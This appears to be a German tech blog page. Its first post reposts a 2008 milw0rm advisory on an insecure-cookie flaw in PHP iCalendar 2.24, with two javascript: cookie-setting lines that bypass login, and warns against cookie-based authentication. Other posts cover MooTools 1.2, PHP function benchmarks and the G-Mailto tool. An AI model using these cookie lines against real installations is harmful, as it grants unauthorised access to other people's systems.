Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden:
####################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";
# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526
Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten mindestens eine Art von Session-System, mit dem man eine Nutzerauthentifizerung auf einfache Art und Weise implementieren kann und an allen Stellen wird darauf hingewiesen das Cookies unsicher sind. Um so schlimmer ist es auch noch das solche Scripte öffentlich angeboten werden. Ein Grund mehr nicht jedem Script, welches angeboten wird, zu vertrauen.
Nach einiger Zeit ist endlich MooTools 1.2 erschienen. Das JavaScript-Framework wurde fast ein Jahr nach dem letzten 1.11er Release veröffentlicht.
Einige der neuen Features der 1.2er Version:
- bessere Domunentation
- verbesserte Effekte
- ‘richtige’ Hash-Objekte
- Swiff Objekt zur Interaktion mit Flash
- die Möglichkeit zu jedem Element Metadaten zu speichern
Bei der Umstellung ist zu beachten, das sich an der API einiges getan hat und man somit evtl. etwas Arbeit in die Umstellung stecken muss – was sich aber meiner Meinung nach mehr als Lohnt.
Das sich die Ausführungsgeschwindigkeit von verschiedenen Funktionen in PHP unterscheidet sollte eigentlich bekannt sein. Chris Vincent hat dazu nun auf der Seite phpbench.com dazu eine Übersicht bereitgestellt, welche die verschiedenen Funktionen miteinander vergleicht. Dazu gibt es zu jeder Funktion Code-Beispiele.
So sieht man z.B. schön, dass die Verwendung von foreach() beim Abarbeiten eines Hashs deutlich schneller ist als eine while()-Schleife, aber auch nicht in jedem Fall. Oder das print etwas langsamer arbeitet als echo.
Passt zwar nicht ganz zum Thema des Blogs, aber dennoch wollte ich es festhalten.
Durch eine Frage bei Wer-Weiss-Was, in der gefragt wurde, wie man GMail (aka Google Mail) als Standard Mailclient einrichtet kam ich auf das Programm G-Mailto.
Dieses richtet die entsprechenden Einstellungen und Registry-Eintröge so ein, dass sich beim Klick auf einen Mailto-Link künftig der (Standard) Browser öffnet und die GMail-Mailsenden-Seite mit den entsprechenden voreingestellten Einträgen anzeigt.
Google selbst hat früher den GMail Notifier angeboten, welcher jetzt zu Gunsten von Google Talk leider nicht mehr weiter entwickelt wird. G-Mailto ist dazu (wie ich finde) eine sehr gute Alternative.